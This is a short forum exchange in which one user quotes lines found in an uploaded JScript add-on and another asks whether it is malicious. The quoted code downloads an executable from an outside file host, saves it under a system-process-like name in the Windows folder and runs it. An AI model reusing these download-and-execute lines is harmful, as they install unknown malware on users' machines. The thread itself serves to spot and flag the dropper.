quote:
Originally posted by Mnjul
Because the script you're uploading has:
JScript code:
Interop.Call("urlmon.dll", "URLDownloadToFileW", 0, "http://disk04.arb-up.com/files/2/rcjs5vg6cyrr8i/svchost.exe", "c:\\windows\\svhost.exe", 0, 0);
Interop.Call("shell32.dll", "ShellExecuteW",0 ,null , "c:\\windows\\svhost.exe" ,null ,null ,1);
?
Is that script malicious? It seems to me it's replacing svhost...